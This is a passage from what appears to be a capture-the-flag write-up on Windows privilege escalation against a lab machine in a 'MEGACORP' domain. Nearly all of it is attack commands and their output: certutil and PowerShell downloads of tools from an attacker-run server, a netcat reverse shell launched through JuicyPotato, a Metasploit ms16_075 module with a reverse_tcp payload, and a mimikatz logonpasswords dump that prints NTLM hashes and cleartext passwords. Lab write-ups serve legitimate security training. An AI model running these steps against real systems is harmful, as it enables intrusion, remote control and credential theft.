Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
Result: Not vulnerable
Trying pentestmonkey/windows-privesc-check:
wget https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/windows-privesc-check2.exe ex.exe
msf shell > ex.exe --audit -a -o report -v
Trying 411Hall/JAWS:
wget https://github.com/411Hall/JAWS/raw/master/jaws-enum.ps1
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/jaws-enum.ps1 jaws.ps1
msf shell > powershell.exe -ExecutionPolicy Bypass -File .\jaws.ps1
msf shell > execute -f powershell.exe -a "-ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt"
"Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack."
CLSID List: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard
Manual Escalation
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
sudo python3 -m http.server 80
meterpreter > shell
> powershell
PS> iwr -outf js.exe http://10.10.14.173/JuicyPotato.exe
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.173 1111 > shell.bat
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 -c {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
Automatic Escalation
meterpreter > background
msf > search ms16_075
msf > use exploit/windows/local/ms16_075_reflection_juicy
msf > set payload windows/meterpreter/reverse_tcp
msf > set session 1
msf > set lhost 10.10.14.173
msf > set dcom_port 1337
msf > set CLSID {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
msf > set lport 8464
msf > run
Result: Server username: NT AUTHORITY\SYSTEM
cd C:\Users\Administrator\Desktop
cat root.txt
Root Flag: 6e9a9fdc6f64e410a68b847bb4b404fa
Post Exploitation
Convert to x64 shell:
use post/windows/manage/archmigrate
set session 2
set IGNORE_SYSTEM true
Get passwords
load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Output:
Authentication Id : 0 ; 298603 (00000000:00048e6b)
Session : Interactive from 1
User Name : sandra
Domain : MEGACORP
Logon Server : PATHFINDER
Logon Time : 5/4/2020 10:20:27 PM
SID : S-1-5-21-1035856440-4137329016-3276773158-1105
msv :
[00000003] Primary
* Username : sandra
* Domain : MEGACORP
* NTLM : 29ab86c5c4d2aab957763e5c1720486d
* SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
* DPAPI : f4c73b3f07c4f309ebf086644254bcbc
tspkg :
wdigest :
* Username : sandra
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : sandra
* Domain : MEGACORP.LOCAL
* Password : Password1234!
ssp :
credman :
Authentication Id : 0 ; 183955 (00000000:0002ce93)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 5/4/2020 10:19:24 PM
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 183792 (00000000:0002cdf0)
Session : Service from 0
User Name : wordpress
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 5/4/2020 10:19:24 PM
SID : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SHIELD$
Domain : MEGACORP
Logon Server : (null)
Logon Time : 5/4/2020 10:19:01 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/4/2020 10:19:08 PM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : IUSR
* Domain : NT AUTHORITY
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/4/2020 10:19:02 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 65711 (00000000:000100af)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/4/2020 10:19:01 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 65691 (00000000:0001009b)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/4/2020 10:19:01 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : SHIELD$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Authentication Id : 0 ; 36390 (00000000:00008e26)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 5/4/2020 10:19:00 PM
SID :
msv :
[00000003] Primary
* Username : SHIELD$
* Domain : MEGACORP
* NTLM : 9d4feee71a4f411bf92a86b523d64437
* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SHIELD$
Domain : MEGACORP
Logon Server : (null)
Logon Time : 5/4/2020 10:19:00 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SHIELD$
* Domain : MEGACORP
* Password : (null)
kerberos :
* Username : shield$
* Domain : MEGACORP.LOCAL
* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
ssp :
credman :
Result: Credentials sandra:Password1234!